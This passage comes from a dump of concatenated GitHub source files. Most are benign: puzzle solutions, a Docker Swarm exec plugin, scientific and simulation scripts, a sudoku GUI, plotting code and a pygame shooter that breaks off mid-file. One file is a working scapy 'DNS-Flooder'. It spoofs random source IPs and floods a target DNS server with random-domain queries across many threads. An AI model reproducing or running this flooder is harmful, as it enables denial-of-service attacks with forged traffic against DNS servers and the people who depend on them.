parse_ledger(ledger)\n calories = sorted(elves, reverse=True)\n number_of_elves = number_of_elves or 1\n return sum(calories[:number_of_elves])\n\n\ndef parse_ledger(ledger: List[str]) -> List[int]:\n elves = [0]\n for entry in ledger:\n if len(entry) == 0:\n elves.append(0)\n 
else:\n elves[-1] += int(entry)\n return elves\n\n\nif __name__ == \"__main__\":\n ledger = static_files.get(\"day_01.txt\")\n print(f\"The top elf has :{max_calories(ledger)}\")\n print(f\"The top three elves have :{max_calories(ledger, 3)}\")\n","repo_name":"mikealfare/advent-of-code-2022","sub_path":"advent_of_code/day_01.py","file_name":"day_01.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16630148875","text":"#!/bin/python3\nimport random\nimport string\nimport subprocess\nimport os\nimport docker\nimport time\nimport sys\nimport click\nfrom typing import List\n\nif len(sys.argv) >= 2:\n if sys.argv[1] == 'docker-cli-plugin-metadata':\n print(\"\"\"\n{\n \"SchemaVersion\": \"0.1.0\",\n \"Vendor\": \"Martin Braun\",\n \"Version\": \"0.0.1\",\n \"ShortDescription\": \"Docker Swarm Proxy\"\n}\n \"\"\")\n exit(0)\n\nif 'swarmproxy' in sys.argv and len(sys.argv) >= 2:\n # we need to strip the first agument for click to work\n # if we run as a docker cli plugin\n sys.argv = sys.argv[1:]\n\ndef get_random_string(length):\n return ''.join(random.choice(string.ascii_letters) for i in range(length))\n\nrandom_str = get_random_string(32)\n\nstack_name = f\"docker_swarm_proxy_{random_str}\"\nnetwork_name = stack_name\nproxy_service_name = \"srv\"\nproxy_shell_container_name = f\"proxy_shell_{random_str}\"\n\nTEMPLATE = f\"\"\"\nversion: \"3.8\"\n\nservices:\n {proxy_service_name}:\n image: tecnativa/docker-socket-proxy\n volumes:\n - /var/run/docker.sock:/var/run/docker.sock\n networks:\n docker_swarm_proxy:\n environment:\n CONTAINERS: 1\n SERVICES: 1\n SWARM: 1\n NODES: 1\n NETWORKS: 1\n TASKS: 1\n VERSION: 1\n\n AUTH: 1\n SECRETS: 1\n POST: 1\n BUILD: 1\n COMMIT: 1\n CONFIGS: 1\n DISTRIBUTION: 1\n EXEC: 1\n GRPC: 1\n IMAGES: 1\n INFO: 1\n PLUGINS: 1\n SESSION: 1\n SYSTEM: 1\n VOLUMES: 1\n deploy:\n mode: global\n\nnetworks:\n docker_swarm_proxy:\n driver: overlay\n attachable: true\n name: {network_name}\n driver_opts:\n encrypted: \"\"\n com.docker.network.driver.mtu: \"1350\"\n\"\"\"\n\n\nif os.path.isfile(\"/bin/docker\"):\n docker_binary = \"/bin/docker\"\nelif os.path.isfile(\"/usr/bin/docker\"):\n docker_binary = \"/usr/bin/docker\"\n\n@click.group()\ndef cli() -> None:\n pass\n\n@click.group()\ndef service() -> None:\n \"\"\"\n Docker Swarm Service Utilities\n \"\"\"\n pass\n\n@service.command('exec')\n@click.option('-i', '--interactive', is_flag=True, show_default=True, default=False, help='Keep STDIN open even if not attached')\n@click.option('-t', '--tty', is_flag=True, show_default=True, default=False, help='Allocate a pseudo-TTY')\n@click.option('-u', '--user', help='Username or UID (format: \"[:]\")')\n@click.argument('service')\n@click.argument('command')\n@click.argument('arg', nargs=-1)\ndef service_exec(\n interactive: bool,\n tty: bool,\n user: string,\n service: string,\n command: string,\n arg: List[str]\n):\n \"\"\"\n Exec into a running service task.\n By default chooses the first task.\n \"\"\"\n def get_running_tasks(service):\n return [\n task\n for task in service.tasks()\n if \"Spec\" in task \n and \"DesiredState\" in task\n and task[\"DesiredState\"] == \"running\"\n and \"Status\" in task\n and \"State\" in task[\"Status\"]\n and task[\"Status\"][\"State\"] == \"running\"\n ]\n\n needs_cleanup = False\n\n try:\n # force usage of the regular SSH client\n # to be able to pick up DOCKER_HOST env var automatically\n from_env = 
docker.from_env(use_ssh_client=True)\n\n def get_service(name):\n # get all service with similar name\n services = from_env.services.list(filters={\"name\": name})\n # exact match required\n services = [service for service in services if service.attrs[\"Spec\"][\"Name\"] == name]\n if len(services) != 1:\n raise AssertionError(f'did not find exactly one service with name {name}')\n return services[0]\n\n service = get_service(service)\n \n running_tasks = get_running_tasks(service)\n if len(running_tasks) == 0:\n raise AssertionError(f\"didn't find running task for service {service}\")\n \n running_task = running_tasks[0]\n node_id_running_task = running_task[\"NodeID\"]\n container_id = running_task[\"Status\"][\"ContainerStatus\"][\"ContainerID\"]\n\n # TODO: dont deploy the service to all nodes, but instead only\n # to the one we care about that is running the task\n needs_cleanup = True\n subprocess.run(\n [docker_binary, \"stack\", \"deploy\", \"-c\", \"-\", stack_name],\n env={\n **os.environ,\n },\n cwd=os.getcwd(),\n input=TEMPLATE.encode('utf-8'),\n check=True\n )\n\n while True:\n # wait for proxy service to be there\n service = get_service(f'{stack_name}_{proxy_service_name}')\n all_tasks = service.tasks()\n desired_running = [\n task\n for task in all_tasks\n if \"Spec\" in task \n and \"DesiredState\" in task\n and task[\"DesiredState\"] == \"running\"\n ]\n actually_running = [\n task\n for task in desired_running\n if \"Status\" in task\n and \"State\" in task[\"Status\"]\n and task[\"Status\"][\"State\"] == \"running\"\n ]\n if len(desired_running) != len(actually_running):\n time.sleep(1)\n else:\n break\n \n interactive_str = '-i' if interactive else ''\n tty_str = '-t' if tty else ''\n user_str = user or ''\n\n docker_flags = [elem for elem in [interactive_str, tty_str] if elem != '']\n\n subprocess.run(\n [\n docker_binary, \n \"run\", \n \"--env\", f\"PROXY_SERVICE_NAME={proxy_service_name}\",\n \"--env\", f\"CONTAINER_ID={container_id}\",\n \"--env\", f\"USER_FLAG={user_str}\",\n \"--env\", f\"IS_TTY={tty_str}\",\n \"--env\", f\"IS_INTERACTIVE={interactive_str}\",\n \"--env\", f\"NODE_ID_RUNNING_TASK={node_id_running_task}\",\n \"--name\", proxy_shell_container_name,\n \"--network\", network_name,\n \"--pull\", \"always\",\n \"--rm\",\n \"--entrypoint\", \"python3\",\n *docker_flags,\n \"ghcr.io/neuroforgede/docker-swarm-proxy/service-exec:master\",\n \"service_exec.py\",\n command,\n *arg\n ],\n env={\n **os.environ,\n },\n cwd=os.getcwd(),\n check=True\n )\n finally:\n if needs_cleanup:\n # hack, ensure that the proxy container is dead and removed\n subprocess.run(\n [docker_binary, \"kill\", proxy_shell_container_name],\n env={\n **os.environ,\n },\n cwd=os.getcwd(),\n stdout=None,\n stderr=None,\n check=False,\n capture_output=True\n )\n # hack, ensure that the proxy container is dead and removed\n subprocess.run(\n [docker_binary, \"rm\", proxy_shell_container_name],\n env={\n **os.environ,\n },\n cwd=os.getcwd(),\n stdout=None,\n stderr=None,\n check=False,\n capture_output=True\n )\n\n # do the proper cleanup of the stack\n subprocess.run(\n [docker_binary, \"stack\", \"rm\", stack_name],\n env={\n **os.environ,\n },\n cwd=os.getcwd(),\n check=True\n )\n\n\ncli.add_command(service)\nif __name__ == '__main__':\n 
cli()","repo_name":"neuroforgede/docker-swarm-proxy","sub_path":"docker_swarm_proxy.py","file_name":"docker_swarm_proxy.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"5903889636","text":"\"\"\"\nThis script extracts the POSCAR files (containing atomic structure information) \nfor materials from Material Projects https://materialsproject.org/, by material\nids, and the material ids are extracted from csv files\n\"\"\"\n\n#first load needed packages\n\nfrom pymatgen import MPRester\n\nimport pandas as pd\n\nmaterial_data = pd.read_csv(\"Your file name here\") #change filename here\nmaterial_data=pd.DataFrame(material_data)\n\nmat_id=material_data['material_id']\nmid_list=list(mat_id)\nprint(mid_list)\n\n#put my API key from https://materialsproject.org/ in the mpr\nAPI_key=\"YOUR_APT_KEY\"\nmpr = MPRester(API_key)\n\n\ndef get_poscar_file(material_id):\n structure=mpr.get_structure_by_material_id(material_id)\n file_name='POS_files/POSCAR.'+material_id\n pos_str=structure.to(fmt='poscar')\n openfile=open(file_name,'wt')\n openfile.write(pos_str)\n openfile.close()\n\n\nprint('running----------------------------')\nfor material_id in mid_list:\n get_poscar_file(material_id)\n print(material_id)","repo_name":"xuejunxu/Materials_Project","sub_path":"Get_poscar_from_csv_2.py","file_name":"Get_poscar_from_csv_2.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41306231642","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Speciallan\n\nimport argparse\nimport sys\nfrom scrapy.cmdline import execute\n\n\ndef main(args):\n\n if args.stage == 1:\n execute(['scrapy', 'crawl', 'product', \"-a\", \"cate_id=1\", \"-a\", \"origin_id=1\"])\n if args.stage == 2:\n execute(['scrapy', 'crawl', 'comment'])\n\n print('加入stage参数')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--stage', '-s', default=0, type=int, help='stage')\n args = parser.parse_args(sys.argv[1:])\n\n main(args)\n\n\n","repo_name":"speciallan/search","sub_path":"scrapy/tutorial/tutorial/spiders/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25013867441","text":"#!./env/bin/python3\n\nfrom scapy.all import *\nfrom time import sleep\nfrom sys import exit as sysexit\nimport string\nimport random\nimport threading\nfrom argparse import ArgumentParser\n\n# check for root\nif not os.geteuid() == 0:\n sysexit(\"\\nOnly root can run this script\\n\")\n\n# init option parser\nparser = ArgumentParser(description='Simple DNS-Flooder')\nparser.add_argument(\"-s\", \"--server\", help='DNS-Server IP Address', required=True)\nparser.add_argument(\"-t\", \"--threads\", type=int, help='Threads to use', required=True)\nargs = parser.parse_args()\n\n# perform dns query\ndef perform_query(dns, domain, sourceIP):\n packet = IP(src=sourceIP, dst=dns) / UDP() / DNS(rd=1, qd=DNSQR(qname=domain))\n send(packet)\n\n# randomized Domain\ndef get_rand_domain():\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(6))\n\n# randomized IP\ndef get_random_IP():\n genIP = \"\"\n for i in range(0, 4):\n part = str(random.randint(1,254))\n genIP += part + \".\"\n return genIP[:-1]\n\n# flood\ndef flood(): \n while True:\n global answ\n 
domainToUse = get_rand_domain()\n ipToUse = get_random_IP()\n try:\n answ = perform_query(args.server, f\"{domainToUse}.com\", ipToUse)\n except:\n domainToUse = get_rand_domain()\n\n# start threads\ndef start_threads():\n threads = int(args.threads)\n for i in range(1,threads):\n t = threading.Thread(target=flood)\n t.start()\n\n# start here\nif __name__ == \"__main__\":\n print(f\"Starting Flood of {args.server} with {args.threads} Threads in 3 seconds ...\")\n sleep(3)\n start_threads()","repo_name":"0xk1f0/python-dns-flood","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"14685340839","text":"\"\"\"\nCreated: Elias Obreque- -2/26/2020\n\n\"\"\"\nfrom ..Abstract.ComponentBase import ComponentBase\nimport numpy as np\nfrom Library.math_sup.Quaternion import Quaternions\n\nRAD2RPM = 60 / (2 * np.pi)\nRPM2RAD = 1 / RAD2RPM\n# nano Tesla to Tesla\nnT2T = 1e-9\n\n\nclass MTTModel(ComponentBase):\n def __init__(self, mtt_properties):\n ComponentBase.__init__(self, 50)\n self.q_b2c = Quaternions(mtt_properties['q_b2c'])\n self.max_c_am2 = mtt_properties['max_c_am2']\n self.min_c_am2 = mtt_properties['min_c_am2']\n self.bias_c = mtt_properties['bias_c']\n self.rw_stddev_c = mtt_properties['rw_stddev_c']\n self.rw_limit_c = mtt_properties['rw_limit_c']\n self.nr_stddev_c = mtt_properties['nr_stddev_c']\n self.step_width = mtt_properties['prop_step']\n self.historical_mtt_torque_b = []\n self.mtt_torque_b = np.zeros(3)\n\n def main_routine(self, count, sc_isDark):\n\n return\n\n def set_step_width(self, value):\n if value < self.step_width:\n self.step_width = value\n\n def calc_torque(self, control_torque_b, mag_earth_b):\n # Body frame to components frame\n mag_earth_c = self.q_b2c.frame_conv(mag_earth_b)\n\n control_mag_mom_b = np.cross(mag_earth_b, control_torque_b)\n control_mag_mom_c = self.q_b2c.frame_conv(control_mag_mom_b)\n\n for i in range(3):\n if control_mag_mom_c[i] > self.max_c_am2[i]:\n control_mag_mom_c[i] = self.max_c_am2[i]\n elif control_mag_mom_c[i] < self.min_c_am2[i]:\n control_mag_mom_c[i] = self.min_c_am2[i]\n\n mtt_torque_c = np.cross(control_mag_mom_c, nT2T * mag_earth_c)\n\n q_c2b = Quaternions(self.q_b2c.conjugate())\n self.mtt_torque_b = q_c2b.frame_conv(mtt_torque_c)\n return self.mtt_torque_b\n\n def get_torque(self):\n return self.mtt_torque_b\n\n def get_current(self):\n return\n\n def log_value(self):\n self.historical_mtt_torque_b.append(self.mtt_torque_b)\n\n def get_log_values(self, subsys):\n report = {'RWModel' + subsys + '_c(X)[Nm]': np.array(self.historical_mtt_torque_b)[:, 0],\n 'RWModel' + subsys + '_c(Y)[Nm]': np.array(self.historical_mtt_torque_b)[:, 1],\n 'RWModel' + subsys + '_c(Z)[Nm]': np.array(self.historical_mtt_torque_b)[:, 2]}\n return report\n","repo_name":"EliasObreque/SpacecraftSimulator","sub_path":"Components/AOCS/MTTModel.py","file_name":"MTTModel.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40376323031","text":"import json\nimport sys\nfrom typing import Mapping, MutableSequence\n\nfrom .main import main\n\nif len(sys.argv) < 2:\n print(\"provide arguement\")\n exit()\n\nbot = sys.argv[1]\n\n\nclass AttrDict:\n \"\"\"A read-only façade for navigating a JSON-like object\n using attribute notation\n \"\"\"\n\n def __init__(self, mapping):\n self._data = dict(mapping)\n\n def 
__getattr__(self, name):\n if hasattr(self._data, name):\n return getattr(self._data, name)\n else:\n try:\n return AttrDict.build(self._data[name])\n\n except KeyError:\n raise AttributeError(f\"json object has no attribute {name}\")\n\n @classmethod\n def build(cls, obj):\n if isinstance(obj, Mapping):\n return cls(obj)\n elif isinstance(obj, MutableSequence):\n return [cls.build(item) for item in obj]\n else:\n return obj\n\n\nconfig_dict = json.loads(open(\"moddy/config.json\").read())\nif bot not in config_dict:\n print(\"not a valid bot\")\n exit()\n\nconfig_dict[bot][\"common\"] = config_dict[\"common\"]\nbot_config = AttrDict(config_dict[bot])\n\nmain(bot_config)\n","repo_name":"Hyperx837/Moddy","sub_path":"moddy/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9398412063","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 11 14:28:52 2023\r\n\r\n@author: ankro\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\ndef rmvbgr(image_rgb):\r\n \r\n image_rgb = cv2.imdecode(np.frombuffer(image_rgb, np.uint8), cv2.IMREAD_UNCHANGED)\r\n #image_rgb=cv2.imread(image_rgb)\r\n \r\n rectangle = (60, 110, 280, 260) \r\n \r\n mask = np.zeros(image_rgb.shape[:2], np.uint8) \r\n \r\n \r\n bgdModel = np.zeros((1, 65), np.float64) \r\n fgdModel = np.zeros((1, 65), np.float64) \r\n\r\n cv2.grabCut(image_rgb, mask, rectangle, bgdModel, fgdModel, 1, cv2.GC_INIT_WITH_RECT)\r\n\r\n mask_2 = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8')\r\n\r\n image_rgd_nobg = image_rgb * mask_2[:, :, np.newaxis]\r\n \r\n img = cv2.resize(image_rgd_nobg,dsize=(150,150))\r\n img = img.reshape((1,) + img.shape)\r\n img = img.astype(np.float32) / 255.0\r\n \r\n return img","repo_name":"AnkitKr0711/Acne_detection_CNN","sub_path":"img_process.py","file_name":"img_process.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"32075545059","text":"from tkinter import *\r\nimport random\r\nimport tkinter\r\nimport tkinter.messagebox\r\nframe=Tk()\r\nmenu=Menu(frame)\r\nfile=Menu(menu)\r\nfile.add_command(label=\"Exit\", command=frame.quit)\r\nfile.add_command(label=\"EASY LEVEL\", command=lambda:easyLvl())\r\nfile.add_command(label=\"MEDIUM LEVEL\", command=lambda:medLvl())\r\nfile.add_command(label=\"HARD LEVEL\", command=lambda:hardLvl())\r\n\r\n\r\nmenu.add_cascade(label=\"Choose difficulty Level \", menu=file)\r\nframe.config(menu=menu)\r\n\r\n\r\n\r\ndef validate(g,number,position):\r\n # Traverse through row\r\n for i in range(len(g[0])):\r\n if g[position[0]][i] == number and position[1] != i:\r\n return False \r\n\r\n # Traverse through col\r\n for i in range(len(g)):\r\n if g[i][position[1]] == number and position[0] != i:\r\n return False \r\n\r\n # Check the mini grid 3x3\r\n minigrid_row = position[1] // 3\r\n minigrid_col = position[0] // 3\r\n for i in range(minigrid_col*3,minigrid_col*3 + 3):\r\n for j in range(minigrid_row*3,minigrid_row*3 + 3):\r\n if g[i][j] == number and (i,j) != position:\r\n return False\r\n\r\n return True\r\n\r\ndef is_empty(g):\r\n for i in range(len(g)):\r\n for j in range(len(g[0])):\r\n if g[i][j] == 0:\r\n return(i,j) \r\n return None\r\n\r\ndef MakeSudoku(n):\r\n grid = [[0 for x in range(9)] for y in range(9)] \r\n for i in range(9):\r\n for j in range(9):\r\n grid[i][j] = 0\r\n \r\n # The range here is the 
amount\r\n\t# of numbers in the grid\r\n for i in range(n):\r\n #choose random numbers\r\n row = random.randrange(9)\r\n col = random.randrange(9)\r\n num = random.randrange(1,10)\r\n while(not validate(grid,num,(row,col)) or grid[row][col] != 0): #if taken or not valid reroll\r\n row = random.randrange(9)\r\n col = random.randrange(9)\r\n num = random.randrange(1,10)\r\n grid[row][col]= num;\r\n return grid \r\n\r\n\r\ndef easyLvl():\r\n frame.title(\"easy level selected\")\r\n n = 35\r\n grid = MakeSudoku(n) \r\n createGrid(grid)\r\n\r\ndef medLvl():\r\n frame.title(\"medium level selected\")\r\n n=30\r\n grid = MakeSudoku(n)\r\n createGrid(grid)\r\n\r\ndef hardLvl():\r\n frame.title(\"hard level selected\")\r\n n = 23\r\n grid = MakeSudoku(n)\r\n createGrid(grid)\r\n\r\ndef sudoku_solve(g):\r\n find = is_empty(g)\r\n if not find:\r\n return True\r\n else:\r\n row,col = find \r\n \r\n for i in range(1,10):\r\n if validate(g, i, (row,col)):\r\n g[row][col] = i\r\n if sudoku_solve(g):\r\n return True\r\n\r\n g[row][col] = 0\r\n return False\r\ndef sudoku(grid):\r\n sudoku_solve(grid)\r\n createGrid(grid)\r\n\r\ndef submission(grid):\r\n sudoku_solve(grid)\r\n g = grid.copy()\r\n sudoku_solve(g)\r\n if g == grid:\r\n tkinter.messagebox.showinfo(\"Result\", \"congratulations you made it!!\")\r\n #else:\r\n tkinter.messagebox.showerror(\"Result \", \"Sorry incorrect ans!! Please try again\")\r\n \r\n\r\ncolourTxt=\"black\"\r\n#-----------------------------MAIN CODE------------------\r\ndef createGrid(grid):\r\n for rowindex in range (9):\r\n for colindex in range (9):\r\n if (rowindex in (0,1,2,6,7,8) and colindex in (3,4,5) or \\\r\n (rowindex in (3,4,5) and colindex in (0,1,2,6,7,8))):\r\n colour=\"light blue\"\r\n else:\r\n colour=\"white\"\r\n\r\n x = grid[rowindex][colindex]\r\n\r\n if x==0:\r\n colourTxt=\"red\"\r\n ent=Entry(frame,width=8, bg=colour,fg=colourTxt)\r\n ent.grid(row=rowindex, column=colindex, sticky=N+S+E+W)\r\n else:\r\n colourTxt=\"black\" \r\n btn = Label(frame, width=8, bg = colour,text=x, fg= colourTxt)\r\n btn.grid(row=rowindex, column=colindex,sticky=N+S+E+W)\r\n '''btn=Button(frame, width=8, bg=colour, text=x, fg=colourTxt) \r\n btn.grid(row=rowindex, column=colindex, sticky=N+S+E+W)'''\r\n sub = Button(frame, width = 8, text = \"Submit\" ,bg = \"yellow\", command=lambda:submission(grid)) \r\n sub.grid(row= 9,column=0)\r\n sol = Button(frame, width=8, text = \"See Solution\", bg = \"red\", command=lambda:sudoku(grid))\r\n sol.grid(row=9, column=1) \r\n\r\n\r\n\r\ngrid = [[0 for x in range(9)] for y in range(9)] \r\ncreateGrid(grid)\r\nframe.mainloop()","repo_name":"benhar017/Sudoku-Generator-and-Solver","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11649804957","text":"import plotly.express as px\nimport pandas as pd\nimport numpy as np\n\nimport os\n\nCWD = os.getcwd()\nsim_name = \"bat_size21\"\n# settings\npd.options.plotting.backend = \"plotly\"\nx = pd.read_excel(CWD + f'/Fixed tilt/battery/{sim_name}.xlsx') # x axis profile\ngraph = pd.read_excel(CWD + f'/Fixed tilt/battery/{sim_name}.xlsx')\n\ntrc = 40000\n\ngraph.rename(columns={'excess': 'to_grid'}, inplace=True)\n\ngraph['excess2'] = graph['to_grid'] # creating 2 equal columns, to work with them separately\n\ngraph.excess2 = np.where(graph.to_grid.eq(20000), graph.Solar_cons, graph.excess2)\ngraph['From_Grid'] = np.where(graph['From_Grid'] > trc, trc, 
graph['From_Grid'])\npd.set_option(\"display.max_rows\", None, \"display.max_columns\", None)\n\nn1 = 0\nn2 = 24 * 365\n\nfig = px.line(x=x['DateTime'][n1:n2], y=[graph['kWcons'][n1:n2], graph['kWsolar'][n1:n2], graph['From_Grid'][n1:n2],\n graph['energy_to_bat'][n1:n2], graph['energy_lost'][n1:n2],\n graph['battery_state_of_charge'][n1:n2]])\n\nfig['data'][0]['name'] = 'Consumed'\nfig['data'][1]['name'] = 'Supplied from PV'\n\nfig['data'][2]['name'] = 'Supplied from Grid'\nfig['data'][3]['name'] = 'Energy delivered to battery'\nfig['data'][4]['name'] = 'Energy lost, due to the grid limitation'\nfig['data'][5]['name'] = 'Battery state of charge'\n\nfig.update_layout(\n xaxis_title=\"Time, days\",\n yaxis_title=\"Energy, kWh\",\n legend_title=\"Legend\",\n legend=dict(\n x=0.8,\n y=1,\n traceorder=\"reversed\",\n title_font_family=\"Times New Roman\",\n font=dict(\n family=\"Courier\",\n size=12,\n color=\"black\"\n ),\n bgcolor=\"LightSteelBlue\",\n bordercolor=\"Black\",\n borderwidth=1\n )\n)\n\nfig.show()\nfig.write_html(\"battery_profile.html\")\n","repo_name":"BakuM2/bat_simple","sub_path":"graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27765890684","text":"import pygame\nfrom pygame.locals import *\nimport random\nimport start_and_end\n\n#处理文件路径\nfrom pathlib import Path\nimage_path = Path('/sound/')\n\n\nenemy_bullet_list = []\nhero_bullet_list = []\nenemy_plane_list = []\nENEMY_APPEAR = pygame.USEREVENT + 1\n\n\ndef play():\n # pygame.init()\n start_and_end.start_and_end.start()\n window = pygame.display.set_mode((480, 640))\n background = pygame.image.load(r\".\\images\\background.png\")\n window.blit(background, (0, 0))\n\n # plane = pygame.image.load(r\".\\images\\hero1.png\")\n plane1 = HeroPlane(window)\n # plane2 = Plane(window, 1)\n bullets = []\n\n pygame.time.set_timer(ENEMY_APPEAR, random.randint(100, 3000))\n # x = 190\n # y = 516\n while True:\n\n window.blit(background, (0, 0))\n # window.blit(plane.image, (plane.x, plane.y))\n hero_crush(plane1)\n enemy_crush()\n\n plane1.display()\n # plane2.display()\n EnemyPlane.enemies_display()\n Bullet.bullets_display()\n\n # 判断是否是点击了退出按钮\n for event in pygame.event.get():\n # print(event.type)\n if event.type == QUIT:\n print(\"exit\")\n exit()\n if event.type == ENEMY_APPEAR:\n EnemyPlane.count -= 1\n if EnemyPlane.count > 0:\n pygame.time.set_timer(ENEMY_APPEAR, random.randint(100, 1000))\n else:\n pygame.time.set_timer(ENEMY_APPEAR, 300000)\n # print(\"enemy appear\")\n enemy_plane_list.append(EnemyPlane(window))\n\n key_control(plane1)\n # key_control(plane2)\n EnemyPlane.enemies_move()\n Bullet.bullets_move()\n # plane2.bullets_move()\n\n score(window, plane1)\n\n result = judge_win_or_lose(plane1)\n if result is not None:\n break\n\n pygame.display.update()\n\n pygame.time.Clock().tick(60)\n\n start_and_end.start_and_end.end(window,result, EnemyPlane.crushed)\n\n\nclass GameObj(object):\n x = 0\n y = 0\n pace = 0\n image = ''\n\n\nclass Plane(GameObj):\n health = 10\n\n def display(self):\n pass\n\n\nclass HeroPlane(GameObj):\n shoot_int = 2\n\n def __init__(self, win, pnum=0):\n self.x = 480 // 2 - 100\n self.y = 640 - 124\n self.pace = 9\n self.image = pygame.image.load(r\".\\images\\hero1.png\")\n self.window = win\n\n self.player_num = pnum # player number\n\n self.bulpre = 0 # shoot preparation\n\n self.blowIndex = 0 # blow image index\n\n self.bullet_image_name = 
r\".\\images\\bullet.png\"\n\n self.crushed_image = [self.image,\n pygame.image.load(r\".\\images\\hero_blowup_n3.png\"),\n pygame.image.load(r\".\\images\\hero_blowup_n2.png\"),\n pygame.image.load(r\".\\images\\hero_blowup_n1.png\")]\n \n\n # 击中事宜\n self.health = 10\n self.crushed = 0\n\n def move_left(self):\n if self.x > -50 + self.pace:\n self.x -= self.pace\n else:\n self.x = -50\n\n def move_right(self):\n if self.x < 480 - 50 - self.pace:\n self.x += self.pace\n else:\n self.x = 480 - 50\n\n def move_up(self):\n if self.y > self.pace:\n self.y -= self.pace\n else:\n self.y = 0\n\n def move_down(self):\n if self.y < 640 - 3 - self.pace:\n self.y += self.pace\n else:\n self.y = 640 - 3\n\n def display(self):\n # 将图片进行加载\n self.window.blit(self.crushed_image[self.blowIndex], (self.x, self.y))\n\n if self.blowIndex > 0:\n self.blowIndex -= 1\n\n if self.bulpre > 0:\n self.bulpre -= 1\n\n keyboard = ({\"up\": K_w, \"left\": K_a, \"down\": K_s, \"right\": K_d, \"shoot\": K_j},\n {\"up\": K_UP, \"left\": K_LEFT, \"down\": K_DOWN, \"right\": K_RIGHT, \"shoot\": K_SPACE})\n\n def shoot(self):\n if self.bulpre == 0:\n hero_bullet_list.append(Bullet(self.x+39, self.y, -10, self.window, self.bullet_image_name))\n self.bulpre = self.shoot_int+1\n # self.bullets.append(SelfBullet(self.x + 17, self.y+10, -10, self.window))\n # self.bullets.append(SelfBullet(self.x + 61, self.y+10, -10, self.window))\n\n def get_hit(self):\n self.health -= 1\n self.blowIndex = 3\n\n\nclass EnemyPlane(Plane):\n shoot_int = 5\n count = 40\n crushed = 0\n finished = 0\n\n def __init__(self, screen):\n # 设置飞机默认的位置\n self.x = random.randint(-10, 480-40)\n self.y = -10\n\n # move speed\n self.pace = 3\n\n # 设置要显示内容的窗口\n self.screen = screen\n\n self.imageName = r\".\\images\\enemy0.png\"\n self.image = pygame.image.load(self.imageName)\n self.bullet_image_name = r\".\\images\\bullet1.png\"\n\n # 子弹发射间隔控制\n self.bulpre = 0\n\n def display(self):\n self.screen.blit(self.image, (self.x, self.y))\n # if self.bulpre == 0:\n self.shoot()\n # self.bulpre = self.shoot_int + 1\n # if self.bulpre > 0:\n # self.bulpre -= 1\n\n def shoot(self):\n num = random.randint(1, 50)\n if num > 48:\n # print(\"发射子弹!\")\n newBullet = Bullet(self.x+21, self.y+39, 8, self.screen,\n self.bullet_image_name)\n enemy_bullet_list.append(newBullet)\n\n def move(self):\n self.y += self.pace\n if self.y > 640:\n return 0\n else:\n return 1\n\n @staticmethod\n def enemies_move():\n i = 0\n while i < len(enemy_plane_list):\n if enemy_plane_list[i].move() == 0:\n del enemy_plane_list[i]\n EnemyPlane.finished += 1\n i -= 1\n i += 1\n\n @staticmethod\n def enemies_display():\n for ene in enemy_plane_list:\n ene.display()\n\n\nclass Bullet(GameObj):\n speed = -10\n image = \"\"\n\n def __init__(self, x, y, speed, window, image_name):\n self.x = x\n self.y = y\n self.speed = speed\n self.window = window\n self.image = pygame.image.load(image_name)\n\n def move(self):\n if self.y < -abs(self.speed) or self.y > 640 + abs(self.speed):\n return 0\n else:\n self.y += self.speed\n return 1\n\n def display(self):\n self.window.blit(self.image, (self.x, self.y))\n\n @staticmethod\n def bullets_move():\n i = 0\n while i < len(hero_bullet_list):\n if hero_bullet_list[i].move() == 0:\n del hero_bullet_list[i]\n i -= 1\n i += 1\n\n i = 0\n while i < len(enemy_bullet_list):\n if enemy_bullet_list[i].move() == 0:\n del enemy_bullet_list[i]\n i -= 1\n i += 1\n\n @staticmethod\n def bullets_display():\n for bul in hero_bullet_list:\n bul.display()\n for bul in 
